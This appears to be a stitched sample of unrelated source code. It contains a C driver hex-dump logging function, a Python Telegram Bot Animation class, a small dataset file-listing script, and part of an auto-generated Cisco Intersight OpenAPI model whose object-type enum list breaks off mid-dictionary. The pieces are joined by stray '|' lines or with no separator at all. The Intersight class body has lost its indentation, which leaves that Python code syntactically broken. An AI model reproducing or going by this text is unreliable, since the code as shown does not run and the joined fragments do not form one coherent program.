int esas2r_log_hexdump(const long level,
		       const void *buf,
		       size_t len)
{
	if (level <= event_log_level) {
		/* 16 bytes per row, 1-byte groups, offset prefix. */
		print_hex_dump(translate_esas2r_event_level_to_kernel(level),
			       "", DUMP_PREFIX_OFFSET, 16, 1, buf,
			       len, true);
	}

	return 1;
}
|
#!/usr/bin/env python
#
# A library that provides a Python interface to the Telegram Bot API
# Copyright (C) 2015-2017
# Leandro Toledo de Souza <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser Public License for more details.
#
# You should have received a copy of the GNU Lesser Public License
# along with this program. If not, see [http://www.gnu.org/licenses/].
"""This module contains an object that represents a Telegram Animation."""
from telegram import PhotoSize
from telegram import TelegramObject
class Animation(TelegramObject):
    """This object represents an animation file to be displayed in the message
    containing a game.

    Attributes:
        file_id (:obj:`str`): Unique file identifier.
        thumb (:class:`telegram.PhotoSize`): Optional. Animation thumbnail as
            defined by sender.
        file_name (:obj:`str`): Optional. Original animation filename as defined
            by sender.
        mime_type (:obj:`str`): Optional. MIME type of the file as defined by
            sender.
        file_size (:obj:`int`): Optional. File size.

    Args:
        file_id (:obj:`str`): Unique file identifier.
        thumb (:class:`telegram.PhotoSize`, optional): Animation thumbnail as
            defined by sender.
        file_name (:obj:`str`, optional): Original animation filename as defined
            by sender.
        mime_type (:obj:`str`, optional): MIME type of the file as defined by
            sender.
        file_size (:obj:`int`, optional): File size.
    """

    def __init__(self,
                 file_id,
                 thumb=None,
                 file_name=None,
                 mime_type=None,
                 file_size=None,
                 **kwargs):
        # Required.
        self.file_id = file_id
        # Optionals.
        self.thumb = thumb
        self.file_name = file_name
        self.mime_type = mime_type
        self.file_size = file_size

        # Identity for equality comparisons is the file_id alone.
        self._id_attrs = (self.file_id,)

    @classmethod
    def de_json(cls, data, bot):
        """Builds an Animation from a decoded JSON dict, or None if empty."""
        if not data:
            return None

        payload = super(Animation, cls).de_json(data, bot)
        # The thumbnail arrives as a nested dict and must itself be
        # deserialized before the constructor is invoked.
        payload['thumb'] = PhotoSize.de_json(payload.get('thumb'), bot)

        return cls(**payload)
|
import os

# Directory whose file names are recorded; listdir order is arbitrary.
SAMPLING_TRAIN_DIR = \
    "/datassd4t/lbd/Large_Automotive_Detection_Dataset_sampling/train"

files = os.listdir(SAMPLING_TRAIN_DIR)
# Drop the last 9 characters of each name (assumes a fixed-length
# suffix such as "_0000.txt" -- TODO confirm) and append a newline so
# each entry occupies its own line in the output file.
files = [(file[:-9] + "\n").encode("utf-8") for file in files]

# Use context managers so the handles are closed even on error; the
# original code never closed the read handle at all.
with open("already_exist.txt", mode='wb') as f:
    f.writelines(files)

with open("already_exist.txt", mode='rb') as f:
    files = f.readlines()
print(files[:5])
"""
Cisco Intersight
Cisco Intersight is a management platform delivered as a service with embedded analytics for your Cisco and 3rd party IT infrastructure. This platform offers an intelligent level of management that enables IT organizations to analyze, simplify, and automate their environments in more advanced ways than the prior generations of tools. Cisco Intersight provides an integrated and intuitive management experience for resources in the traditional data center as well as at the edge. With flexible deployment options to address complex security needs, getting started with Intersight is quick and easy. Cisco Intersight has deep integration with Cisco UCS and HyperFlex systems allowing for remote deployment, configuration, and ongoing maintenance. The model-based deployment works for a single system in a remote location or hundreds of systems in a data center and enables rapid, standardized configuration and deployment. It also streamlines maintaining those systems whether you are working with small or very large configurations. The Intersight OpenAPI document defines the complete set of properties that are returned in the HTTP response. From that perspective, a client can expect that no additional properties are returned, unless these properties are explicitly defined in the OpenAPI document. However, when a client uses an older version of the Intersight OpenAPI document, the server may send additional properties because the software is more recent than the client. In that case, the client may receive properties that it does not know about. Some generated SDKs perform a strict validation of the HTTP response body against the OpenAPI document. # noqa: E501
The version of the OpenAPI document: 1.0.9-4950
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from intersight.model_utils import ( # noqa: F401
ApiTypeError,
ModelComposed,
ModelNormal,
ModelSimple,
cached_property,
change_keys_js_to_python,
convert_js_args_to_python_args,
date,
datetime,
file_type,
none_type,
validate_get_composed_info,
)
def lazy_import():
    """Import the model classes this module references and publish them
    into the module globals.

    The imports are deferred to avoid circular-import problems at module
    load time; each class is looked up in its submodule and bound under
    its own name, exactly as the equivalent ``from ... import ...``
    statements would do.
    """
    # (submodule under intersight.model, class name) pairs.
    model_classes = (
        ('display_names', 'DisplayNames'),
        ('mo_base_mo_relationship', 'MoBaseMoRelationship'),
        ('mo_mo_ref', 'MoMoRef'),
        ('mo_tag', 'MoTag'),
        ('mo_version_context', 'MoVersionContext'),
        ('workflow_action_workflow_definition',
         'WorkflowActionWorkflowDefinition'),
        ('workflow_base_data_type', 'WorkflowBaseDataType'),
        ('workflow_solution_action_definition',
         'WorkflowSolutionActionDefinition'),
        ('workflow_solution_definition_relationship',
         'WorkflowSolutionDefinitionRelationship'),
        ('workflow_validation_information',
         'WorkflowValidationInformation'),
        ('workflow_workflow_definition_relationship',
         'WorkflowWorkflowDefinitionRelationship'),
    )
    for module_name, class_name in model_classes:
        module = __import__('intersight.model.' + module_name,
                            fromlist=[class_name])
        globals()[class_name] = getattr(module, class_name)
class WorkflowSolutionActionDefinitionRelationship(ModelComposed):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
Attributes:
allowed_values (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
with a capitalized key describing the allowed value and an allowed
value. These dicts store the allowed enum values.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
discriminator_value_class_map (dict): A dict to go from the discriminator
variable value to the discriminator class name.
validations (dict): The key is the tuple path to the attribute
and the for var_name this is (var_name,). The value is a dict
that stores validations for max_length, min_length, max_items,
min_items, exclusive_maximum, inclusive_maximum, exclusive_minimum,
inclusive_minimum, and regex.
additional_properties_type (tuple): A tuple of classes accepted
as additional properties values.
"""
allowed_values = {
('class_id',): {
'MO.MOREF': "mo.MoRef",
},
('action_type',): {
'EXTERNAL': "External",
'INTERNAL': "Internal",
'REPETITIVE': "Repetitive",
},
('allowed_instance_states',): {
'None': None,
'NOTCREATED': "NotCreated",
'INPROGRESS': "InProgress",
'FAILED': "Failed",
'OKAY': "Okay",
'DECOMMISSIONED': "Decommissioned",
},
('object_type',): {
'AAA.AUDITRECORD': "aaa.AuditRecord",
'AAA.RETENTIONCONFIG': "aaa.RetentionConfig",
'AAA.RETENTIONPOLICY': "aaa.RetentionPolicy",
'ACCESS.POLICY': "access.Policy",
'ADAPTER.CONFIGPOLICY': "adapter.ConfigPolicy",
'ADAPTER.EXTETHINTERFACE': "adapter.ExtEthInterface",
'ADAPTER.HOSTETHINTERFACE': "adapter.HostEthInterface",
'ADAPTER.HOSTFCINTERFACE': "adapter.HostFcInterface",
'ADAPTER.HOSTISCSIINTERFACE': "adapter.HostIscsiInterface",
'ADAPTER.UNIT': "adapter.Unit",
'ADAPTER.UNITEXPANDER': "adapter.UnitExpander",
'APPLIANCE.APPSTATUS': "appliance.AppStatus",
'APPLIANCE.AUTORMAPOLICY': "appliance.AutoRmaPolicy",
'APPLIANCE.BACKUP': "appliance.Backup",
'APPLIANCE.BACKUPPOLICY': "appliance.BackupPolicy",
'APPLIANCE.CERTIFICATESETTING': "appliance.CertificateSetting",
'APPLIANCE.DATAEXPORTPOLICY': "appliance.DataExportPolicy",
'APPLIANCE.DEVICECERTIFICATE': "appliance.DeviceCertificate",
'APPLIANCE.DEVICECLAIM': "appliance.DeviceClaim",
'APPLIANCE.DEVICEUPGRADEPOLICY': "appliance.DeviceUpgradePolicy",
'APPLIANCE.DIAGSETTING': "appliance.DiagSetting",
'APPLIANCE.EXTERNALSYSLOGSETTING': "appliance.ExternalSyslogSetting",
'APPLIANCE.FILEGATEWAY': "appliance.FileGateway",
'APPLIANCE.FILESYSTEMSTATUS': "appliance.FileSystemStatus",
'APPLIANCE.GROUPSTATUS': "appliance.GroupStatus",
'APPLIANCE.IMAGEBUNDLE': "appliance.ImageBundle",
'APPLIANCE.NODEINFO': "appliance.NodeInfo",
'APPLIANCE.NODESTATUS': "appliance.NodeStatus",
'APPLIANCE.RELEASENOTE': "appliance.ReleaseNote",
'APPLIANCE.REMOTEFILEIMPORT': "appliance.RemoteFileImport",
'APPLIANCE.RESTORE': "appliance.Restore",
'APPLIANCE.SETUPINFO': "appliance.SetupInfo",
'APPLIANCE.SYSTEMINFO': "appliance.SystemInfo",
'APPLIANCE.SYSTEMSTATUS': "appliance.SystemStatus",
'APPLIANCE.UPGRADE': "appliance.Upgrade",
'APPLIANCE.UPGRADEPOLICY': "appliance.UpgradePolicy",
'ASSET.CLUSTERMEMBER': "asset.ClusterMember",
'ASSET.DEPLOYMENT': "asset.Deployment",
'ASSET.DEPLOYMENTDEVICE': "asset.DeploymentDevice",
'ASSET.DEVICECLAIM': "asset.DeviceClaim",
'ASSET.DEVICECONFIGURATION': "asset.DeviceConfiguration",
'ASSET.DEVICECONNECTORMANAGER': "asset.DeviceConnectorManager",
'ASSET.DEVICECONTRACTINFORMATION': "asset.DeviceContractInformation",
'ASSET.DEVICECONTRACTNOTIFICATION': "asset.DeviceContractNotification",
'ASSET.DEVICEREGISTRATION': "asset.DeviceRegistration",
'ASSET.SUBSCRIPTION': "asset.Subscription",
'ASSET.SUBSCRIPTIONACCOUNT': "asset.SubscriptionAccount",
'ASSET.SUBSCRIPTIONDEVICECONTRACTINFORMATION': "asset.SubscriptionDeviceContractInformation",
'ASSET.TARGET': "asset.Target",
'BIOS.BOOTDEVICE': "bios.BootDevice",
'BIOS.BOOTMODE': "bios.BootMode",
'BIOS.POLICY': "bios.Policy",
'BIOS.SYSTEMBOOTORDER': "bios.SystemBootOrder",
'BIOS.TOKENSETTINGS': "bios.TokenSettings",
'BIOS.UNIT': "bios.Unit",
'BIOS.VFSELECTMEMORYRASCONFIGURATION': "bios.VfSelectMemoryRasConfiguration",
'BOOT.CDDDEVICE': "boot.CddDevice",
'BOOT.DEVICEBOOTMODE': "boot.DeviceBootMode",
'BOOT.DEVICEBOOTSECURITY': "boot.DeviceBootSecurity",
'BOOT.HDDDEVICE': "boot.HddDevice",
'BOOT.ISCSIDEVICE': "boot.IscsiDevice",
'BOOT.NVMEDEVICE': "boot.NvmeDevice",
'BOOT.PCHSTORAGEDEVICE': "boot.PchStorageDevice",
'BOOT.PRECISIONPOLICY': "boot.PrecisionPolicy",
'BOOT.PXEDEVICE': "boot.PxeDevice",
'BOOT.SANDEVICE': "boot.SanDevice",
'BOOT.SDDEVICE': "boot.SdDevice",
'BOOT.UEFISHELLDEVICE': "boot.UefiShellDevice",
'BOOT.USBDEVICE': "boot.UsbDevice",
'BOOT.VMEDIADEVICE': "boot.VmediaDevice",
'BULK.EXPORT': "bulk.Export",
'BULK.EXPORTEDITEM': "bulk.ExportedItem",
'BULK.MOCLONER': "bulk.MoCloner",
'BULK.MOMERGER': "bulk.MoMerger",
'BULK.REQUEST': "bulk.Request",
'BULK.SUBREQUESTOBJ': "bulk.SubRequestObj",
'CAPABILITY.ADAPTERUNITDESCRIPTOR': "capability.AdapterUnitDescriptor",
'CAPABILITY.CATALOG': "capability.Catalog",
'CAPABILITY.CHASSISDESCRIPTOR': "capability.ChassisDescriptor",
'CAPABILITY.CHASSISMANUFACTURINGDEF': "capability.ChassisManufacturingDef",
'CAPABILITY.CIMCFIRMWAREDESCRIPTOR': "capability.CimcFirmwareDescriptor",
'CAPABILITY.EQUIPMENTPHYSICALDEF': "capability.EquipmentPhysicalDef",
'CAPABILITY.EQUIPMENTSLOTARRAY': "capability.EquipmentSlotArray",
'CAPABILITY.FANMODULEDESCRIPTOR': "capability.FanModuleDescriptor",
'CAPABILITY.FANMODULEMANUFACTURINGDEF': "capability.FanModuleManufacturingDef",
'CAPABILITY.IOCARDCAPABILITYDEF': "capability.IoCardCapabilityDef",
'CAPABILITY.IOCARDDESCRIPTOR': "capability.IoCardDescriptor",
'CAPABILITY.IOCARDMANUFACTURINGDEF': "capability.IoCardManufacturingDef",
'CAPABILITY.PORTGROUPAGGREGATIONDEF': "capability.PortGroupAggregationDef",
'CAPABILITY.PSUDESCRIPTOR': "capability.PsuDescriptor",
'CAPABILITY.PSUMANUFACTURINGDEF': "capability.PsuManufacturingDef",
'CAPABILITY.SERVERMODELSCAPABILITYDEF': "capability.ServerModelsCapabilityDef",
'CAPABILITY.SERVERSCHEMADESCRIPTOR': "capability.ServerSchemaDescriptor",
'CAPABILITY.SIOCMODULECAPABILITYDEF': "capability.SiocModuleCapabilityDef",
'CAPABILITY.SIOCMODULEDESCRIPTOR': "capability.SiocModuleDescriptor",
'CAPABILITY.SIOCMODULEMANUFACTURINGDEF': "capability.SiocModuleManufacturingDef",
'CAPABILITY.SWITCHCAPABILITY': "capability.SwitchCapability",
'CAPABILITY.SWITCHDESCRIPTOR': "capability.SwitchDescriptor",
'CAPABILITY.SWITCHMANUFACTURINGDEF': "capability.SwitchManufacturingDef",
'CERTIFICATEMANAGEMENT.POLICY': "certificatemanagement.Policy",
'CHASSIS.CONFIGCHANGEDETAIL': "chassis.ConfigChangeDetail",
'CHASSIS.CONFIGIMPORT': "chassis.ConfigImport",
'CHASSIS.CONFIGRESULT': "chassis.ConfigResult",
'CHASSIS.CONFIGRESULTENTRY': "chassis.ConfigResultEntry",
'CHASSIS.IOMPROFILE': "chassis.IomProfile",
'CHASSIS.PROFILE': "chassis.Profile",
'CLOUD.AWSBILLINGUNIT': "cloud.AwsBillingUnit",
'CLOUD.AWSKEYPAIR': "cloud.AwsKeyPair",
'CLOUD.AWSNETWORKINTERFACE': "cloud.AwsNetworkInterface",
'CLOUD.AWSORGANIZATIONALUNIT': "cloud.AwsOrganizationalUnit",
'CLOUD.AWSSECURITYGROUP': "cloud.AwsSecurityGroup",
'CLOUD.AWSSUBNET': "cloud.AwsSubnet",
'CLOUD.AWSVIRTUALMACHINE': "cloud.AwsVirtualMachine",
'CLOUD.AWSVOLUME': "cloud.AwsVolume",
'CLOUD.AWSVPC': "cloud.AwsVpc",
'CLOUD.COLLECTINVENTORY': "cloud.CollectInventory",
'CLOUD.REGIONS': "cloud.Regions",
'CLOUD.SKUCONTAINERTYPE': "cloud.SkuContainerType",
'CLOUD.SKUDATABASETYPE': "cloud.SkuDatabaseType",
'CLOUD.SKUINSTANCETYPE': "cloud.SkuInstanceType",
'CLOUD.SKUNETWORKTYPE': "cloud.SkuNetworkType",
'CLOUD.SKUREGIONRATECARDS': "cloud.SkuRegionRateCards",
'CLOUD.SKUVOLUMETYPE': "cloud.SkuVolumeType",
'CLOUD.TFCAGENTPOOL': "cloud.TfcAgentpool",
'CLOUD.TFCORGANIZATION': "cloud.TfcOrganization",
'CLOUD.TFCWORKSPACE': "cloud.TfcWorkspace",
'COMM.HTTPPROXYPOLICY': "comm.HttpProxyPolicy",
'COMPUTE.BIOSPOSTPOLICY': "compute.BiosPostPolicy",
'COMPUTE.BLADE': "compute.Blade",
'COMPUTE.BLADEIDENTITY': "compute.BladeIdentity",
'COMPUTE.BOARD': "compute.Board",
'COMPUTE.MAPPING': "compute.Mapping",
'COMPUTE.PHYSICALSUMMARY': "compute.PhysicalSummary",
'COMPUTE.RACKUNIT': "compute.RackUnit",
'COMPUTE.RACKUNITIDENTITY': "compute.RackUnitIdentity",
'COMPUTE.SERVERPOWERPOLICY': "compute.ServerPowerPolicy",
'COMPUTE.SERVERSETTING': "compute.ServerSetting",
'COMPUTE.VMEDIA': "compute.Vmedia",
'COND.ALARM': "cond.Alarm",
'COND.ALARMAGGREGATION': "cond.AlarmAggregation",
'COND.HCLSTATUS': "cond.HclStatus",
'COND.HCLSTATUSDETAIL': "cond.HclStatusDetail",
'COND.HCLSTATUSJOB': "cond.HclStatusJob",
'CONNECTORPACK.CONNECTORPACKUPGRADE': "connectorpack.ConnectorPackUpgrade",
'CONNECTORPACK.UPGRADEIMPACT': "connectorpack.UpgradeImpact",
'CONVERGEDINFRA.HEALTHCHECKDEFINITION': "convergedinfra.HealthCheckDefinition",
'CONVERGEDINFRA.HEALTHCHECKEXECUTION': "convergedinfra.HealthCheckExecution",
'CONVERGEDINFRA.POD': "convergedinfra.Pod",
'CRD.CUSTOMRESOURCE': "crd.CustomResource",
'DEVICECONNECTOR.POLICY': "deviceconnector.Policy",
'EQUIPMENT.CHASSIS': "equipment.Chassis",
'EQUIPMENT.CHASSISIDENTITY': "equipment.ChassisIdentity",
'EQUIPMENT.CHASSISOPERATION': "equipment.ChassisOperation",
'EQUIPMENT.DEVICESUMMARY': "equipment.DeviceSummary",
'EQUIPMENT.EXPANDERMODULE': "equipment.ExpanderModule",
'EQUIPMENT.FAN': "equipment.Fan",
'EQUIPMENT.FANCONTROL': "equipment.FanControl",
'EQUIPMENT.FANMODULE': "equipment.FanModule",
'EQUIPMENT.FEX': "equipment.Fex",
'EQUIPMENT.FEXIDENTITY': "equipment.FexIdentity",
'EQUIPMENT.FEXOPERATION': "equipment.FexOperation",
'EQUIPMENT.FRU': "equipment.Fru",
'EQUIPMENT.IDENTITYSUMMARY': "equipment.IdentitySummary",
'EQUIPMENT.IOCARD': "equipment.IoCard",
'EQUIPMENT.IOCARDOPERATION': "equipment.IoCardOperation",
'EQUIPMENT.IOEXPANDER': "equipment.IoExpander",
'EQUIPMENT.LOCATORLED': "equipment.LocatorLed",
'EQUIPMENT.PSU': "equipment.Psu",
'EQUIPMENT.PSUCONTROL': "equipment.PsuControl",
'EQUIPMENT.RACKENCLOSURE': "equipment.RackEnclosure",
'EQUIPMENT.RACKENCLOSURESLOT': "equipment.RackEnclosureSlot",
'EQUIPMENT.SHAREDIOMODULE': "equipment.SharedIoModule",
'EQUIPMENT.SWITCHCARD': "equipment.SwitchCard",
'EQUIPMENT.SYSTEMIOCONTROLLER': "equipment.SystemIoController",
'EQUIPMENT.TPM': "equipment.Tpm",
'EQUIPMENT.TRANSCEIVER': "equipment.Transceiver",
'ETHER.HOSTPORT': "ether.HostPort",
'ETHER.NETWORKPORT': "ether.NetworkPort",
'ETHER.PHYSICALPORT': "ether.PhysicalPort",
'ETHER.PORTCHANNEL': "ether.PortChannel",
'EXTERNALSITE.AUTHORIZATION': "externalsite.Authorization",
'FABRIC.APPLIANCEPCROLE': "fabric.AppliancePcRole",
'FABRIC.APPLIANCEROLE': "fabric.ApplianceRole",
'FABRIC.CONFIGCHANGEDETAIL': "fabric.ConfigChangeDetail",
'FABRIC.CONFIGRESULT': "fabric.ConfigResult",
'FABRIC.CONFIGRESULTENTRY': "fabric.ConfigResultEntry",
'FABRIC.ELEMENTIDENTITY': "fabric.ElementIdentity",
'FABRIC.ESTIMATEIMPACT': "fabric.EstimateImpact",
'FABRIC.ETHNETWORKCONTROLPOLICY': "fabric.EthNetworkControlPolicy",
'FABRIC.ETHNETWORKGROUPPOLICY': "fabric.EthNetworkGroupPolicy",
'FABRIC.ETHNETWORKPOLICY': "fabric.EthNetworkPolicy",
'FABRIC.FCNETWORKPOLICY': "fabric.FcNetworkPolicy",
'FABRIC.FCSTORAGEROLE': "fabric.FcStorageRole",
'FABRIC.FCUPLINKPCROLE': "fabric.FcUplinkPcRole",
'FABRIC.FCUPLINKROLE': "fabric.FcUplinkRole",
'FABRIC.FCOEUPLINKPCROLE': "fabric.FcoeUplinkPcRole",
'FABRIC.FCOEUPLINKROLE': "fabric.FcoeUplinkRole",
'FABRIC.FLOWCONTROLPOLICY': "fabric.FlowControlPolicy",
'FABRIC.LINKAGGREGATIONPOLICY': "fabric.LinkAggregationPolicy",
'FABRIC.LINKCONTROLPOLICY': "fabric.LinkControlPolicy",
'FABRIC.MULTICASTPOLICY': "fabric.MulticastPolicy",
'FABRIC.PCMEMBER': "fabric.PcMember",
'FABRIC.PCOPERATION': "fabric.PcOperation",
'FABRIC.PORTMODE': "fabric.PortMode",
'FABRIC.PORTOPERATION': "fabric.PortOperation",
'FABRIC.PORTPOLICY': "fabric.PortPolicy",
'FABRIC.SERVERROLE': "fabric.ServerRole",
'FABRIC.SWITCHCLUSTERPROFILE': "fabric.SwitchClusterProfile",
'FABRIC.SWITCHCONTROLPOLICY': "fabric.SwitchControlPolicy",
'FABRIC.SWITCHPROFILE': "fabric.SwitchProfile",
'FABRIC.SYSTEMQOSPOLICY': "fabric.SystemQosPolicy",
'FABRIC.UPLINKPCROLE': "fabric.UplinkPcRole",
'FABRIC.UPLINKROLE': "fabric.UplinkRole",
'FABRIC.VLAN': "fabric.Vlan",
'FABRIC.VSAN': "fabric.Vsan",
'FAULT.INSTANCE': "fault.Instance",
'FC.PHYSICALPORT': "fc.PhysicalPort",
'FC.PORTCHANNEL': "fc.PortChannel",
'FCPOOL.FCBLOCK': "fcpool.FcBlock",
'FCPOOL.LEASE': "fcpool.Lease",
'FCPOOL.POOL': "fcpool.Pool",
'FCPOOL.POOLMEMBER': "fcpool.PoolMember",
'FCPOOL.UNIVERSE': "fcpool.Universe",
'FEEDBACK.FEEDBACKPOST': "feedback.FeedbackPost",
'FIRMWARE.BIOSDESCRIPTOR': "firmware.BiosDescriptor",
'FIRMWARE.BOARDCONTROLLERDESCRIPTOR': "firmware.BoardControllerDescriptor",
'FIRMWARE.CHASSISUPGRADE': "firmware.ChassisUpgrade",
'FIRMWARE.CIMCDESCRIPTOR': "firmware.CimcDescriptor",
'FIRMWARE.DIMMDESCRIPTOR': "firmware.DimmDescriptor",
'FIRMWARE.DISTRIBUTABLE': "firmware.Distributable",
'FIRMWARE.DISTRIBUTABLEMETA': "firmware.DistributableMeta",
'FIRMWARE.DRIVEDESCRIPTOR': "firmware.DriveDescriptor",
'FIRMWARE.DRIVERDISTRIBUTABLE': "firmware.DriverDistributable",
'FIRMWARE.EULA': "firmware.Eula",
'FIRMWARE.FIRMWARESUMMARY': "firmware.FirmwareSummary",
'FIRMWARE.GPUDESCRIPTOR': "firmware.GpuDescriptor",
'FIRMWARE.HBADESCRIPTOR': "firmware.HbaDescriptor",
'FIRMWARE.IOMDESCRIPTOR': "firmware.IomDescriptor",
'FIRMWARE.MSWITCHDESCRIPTOR': "firmware.MswitchDescriptor",
'FIRMWARE.NXOSDESCRIPTOR': "firmware.NxosDescriptor",
'FIRMWARE.PCIEDESCRIPTOR': "firmware.PcieDescriptor",
'FIRMWARE.PSUDESCRIPTOR': "firmware.PsuDescriptor",
'FIRMWARE.RUNNINGFIRMWARE': "firmware.RunningFirmware",
'FIRMWARE.SASEXPANDERDESCRIPTOR': "firmware.SasExpanderDescriptor",
'FIRMWARE.SERVERCONFIGURATIONUTILITYDISTRIBUTABLE': "firmware.ServerConfigurationUtilityDistributable",
'FIRMWARE.STORAGECONTROLLERDESCRIPTOR': "firmware.StorageControllerDescriptor",
'FIRMWARE.SWITCHUPGRADE': "firmware.SwitchUpgrade",
'FIRMWARE.UNSUPPORTEDVERSIONUPGRADE': "firmware.UnsupportedVersionUpgrade",
'FIRMWARE.UPGRADE': "firmware.Upgrade",
'FIRMWARE.UPGRADEIMPACT': "firmware.UpgradeImpact",
'FIRMWARE.UPGRADEIMPACTSTATUS': "firmware.UpgradeImpactStatus",
'FIRMWARE.UPGRADESTATUS': "firmware.UpgradeStatus",
'FORECAST.CATALOG': "forecast.Catalog",
'FORECAST.DEFINITION': "forecast.Definition",
'FORECAST.INSTANCE': "forecast.Instance",
'GRAPHICS.CARD': "graphics.Card",
'GRAPHICS.CONTROLLER': "graphics.Controller",
'HCL.COMPATIBILITYSTATUS': "hcl.CompatibilityStatus",
'HCL.DRIVERIMAGE': "hcl.DriverImage",
'HCL.EXEMPTEDCATALOG': "hcl.ExemptedCatalog",
'HCL.HYPERFLEXSOFTWARECOMPATIBILITYINFO': "hcl.HyperflexSoftwareCompatibilityInfo",
'HCL.OPERATINGSYSTEM': "hcl.OperatingSystem",
'HCL.OPERATINGSYSTEMVENDOR': "hcl.OperatingSystemVendor",
'HCL.SUPPORTEDDRIVERNAME': "hcl.SupportedDriverName",
'HYPERFLEX.ALARM': "hyperflex.Alarm",
'HYPERFLEX.APPCATALOG': "hyperflex.AppCatalog",
'HYPERFLEX.AUTOSUPPORTPOLICY': "hyperflex.AutoSupportPolicy",
'HYPERFLEX.BACKUPCLUSTER': "hyperflex.BackupCluster",
'HYPERFLEX.CAPABILITYINFO': "hyperflex.CapabilityInfo",
'HYPERFLEX.CLUSTER': "hyperflex.Cluster",
'HYPERFLEX.CLUSTERBACKUPPOLICY': "hyperflex.ClusterBackupPolicy",
'HYPERFLEX.CLUSTERBACKUPPOLICYDEPLOYMENT': "hyperflex.ClusterBackupPolicyDeployment",
'HYPERFLEX.CLUSTERBACKUPPOLICYINVENTORY': "hyperflex.ClusterBackupPolicyInventory",
'HYPERFLEX.CLUSTERHEALTHCHECKEXECUTIONSNAPSHOT': "hyperflex.ClusterHealthCheckExecutionSnapshot",
'HYPERFLEX.CLUSTERNETWORKPOLICY': "hyperflex.ClusterNetworkPolicy",
'HYPERFLEX.CLUSTERPROFILE': "hyperflex.ClusterProfile",
'HYPERFLEX.CLUSTERREPLICATIONNETWORKPOLICY': "hyperflex.ClusterReplicationNetworkPolicy",
'HYPERFLEX.CLUSTERREPLICATIONNETWORKPOLICYDEPLOYMENT': "hyperflex.ClusterReplicationNetworkPolicyDeployment",
'HYPERFLEX.CLUSTERSTORAGEPOLICY': "hyperflex.ClusterStoragePolicy",
'HYPERFLEX.CONFIGRESULT': "hyperflex.ConfigResult",
'HYPERFLEX.CONFIGRESULTENTRY': "hyperflex.ConfigResultEntry",
'HYPERFLEX.DATAPROTECTIONPEER': "hyperflex.DataProtectionPeer",
'HYPERFLEX.DATASTORESTATISTIC': "hyperflex.DatastoreStatistic",
'HYPERFLEX.DEVICEPACKAGEDOWNLOADSTATE': "hyperflex.DevicePackageDownloadState",
'HYPERFLEX.DRIVE': "hyperflex.Drive",
'HYPERFLEX.EXTFCSTORAGEPOLICY': "hyperflex.ExtFcStoragePolicy",
'HYPERFLEX.EXTISCSISTORAGEPOLICY': "hyperflex.ExtIscsiStoragePolicy",
'HYPERFLEX.FEATURELIMITEXTERNAL': "hyperflex.FeatureLimitExternal",
'HYPERFLEX.FEATURELIMITINTERNAL': "hyperflex.FeatureLimitInternal",
'HYPERFLEX.HEALTH': "hyperflex.Health",
'HYPERFLEX.HEALTHCHECKDEFINITION': "hyperflex.HealthCheckDefinition",
'HYPERFLEX.HEALTHCHECKEXECUTION': "hyperflex.HealthCheckExecution",
'HYPERFLEX.HEALTHCHECKEXECUTIONSNAPSHOT': "hyperflex.HealthCheckExecutionSnapshot",
'HYPERFLEX.HEALTHCHECKPACKAGECHECKSUM': "hyperflex.HealthCheckPackageChecksum",
'HYPERFLEX.HXDPVERSION': "hyperflex.HxdpVersion",
'HYPERFLEX.LICENSE': "hyperflex.License",
'HYPERFLEX.LOCALCREDENTIALPOLICY': "hyperflex.LocalCredentialPolicy",
'HYPERFLEX.NODE': "hyperflex.Node",
'HYPERFLEX.NODECONFIGPOLICY': "hyperflex.NodeConfigPolicy",
'HYPERFLEX.NODEPROFILE': "hyperflex.NodeProfile",
'HYPERFLEX.PROTECTEDCLUSTER': "hyperflex.ProtectedCluster",
'HYPERFLEX.PROXYSETTINGPOLICY': "hyperflex.ProxySettingPolicy",
'HYPERFLEX.SERVERFIRMWAREVERSION': "hyperflex.ServerFirmwareVersion",
'HYPERFLEX.SERVERFIRMWAREVERSIONENTRY': "hyperflex.ServerFirmwareVersionEntry",
'HYPERFLEX.SERVERMODEL': "hyperflex.ServerModel",
'HYPERFLEX.SERVICEAUTHTOKEN': "hyperflex.ServiceAuthToken",
'HYPERFLEX.SOFTWAREDISTRIBUTIONCOMPONENT': "hyperflex.SoftwareDistributionComponent",
'HYPERFLEX.SOFTWAREDISTRIBUTIONENTRY': "hyperflex.SoftwareDistributionEntry",
'HYPERFLEX.SOFTWAREDISTRIBUTIONVERSION': "hyperflex.SoftwareDistributionVersion",
'HYPERFLEX.SOFTWAREVERSIONPOLICY': "hyperflex.SoftwareVersionPolicy",
'HYPERFLEX.STORAGECONTAINER': "hyperflex.StorageContainer",
'HYPERFLEX.SYSCONFIGPOLICY': "hyperflex.SysConfigPolicy",
'HYPERFLEX.UCSMCONFIGPOLICY': "hyperflex.UcsmConfigPolicy",
'HYPERFLEX.VCENTERCONFIGPOLICY': "hyperflex.VcenterConfigPolicy",
'HYPERFLEX.VMBACKUPINFO': "hyperflex.VmBackupInfo",
'HYPERFLEX.VMIMPORTOPERATION': "hyperflex.VmImportOperation",
'HYPERFLEX.VMRESTOREOPERATION': "hyperflex.VmRestoreOperation",
'HYPERFLEX.VMSNAPSHOTINFO': "hyperflex.VmSnapshotInfo",
'HYPERFLEX.VOLUME': "hyperflex.Volume",
'HYPERFLEX.WITNESSCONFIGURATION': "hyperflex.WitnessConfiguration",
'IAAS.CONNECTORPACK': "iaas.ConnectorPack",
'IAAS.DEVICESTATUS': "iaas.DeviceStatus",
'IAAS.DIAGNOSTICMESSAGES': "iaas.DiagnosticMessages",
'IAAS.LICENSEINFO': "iaas.LicenseInfo",
'IAAS.MOSTRUNTASKS': "iaas.MostRunTasks",
'IAAS.SERVICEREQUEST': "iaas.ServiceRequest",
'IAAS.UCSDINFO': "iaas.UcsdInfo",
'IAAS.UCSDMANAGEDINFRA': "iaas.UcsdManagedInfra",
'IAAS.UCSDMESSAGES': "iaas.UcsdMessages",
'IAM.ACCOUNT': "iam.Account",
'IAM.ACCOUNTEXPERIENCE': "iam.AccountExperience",
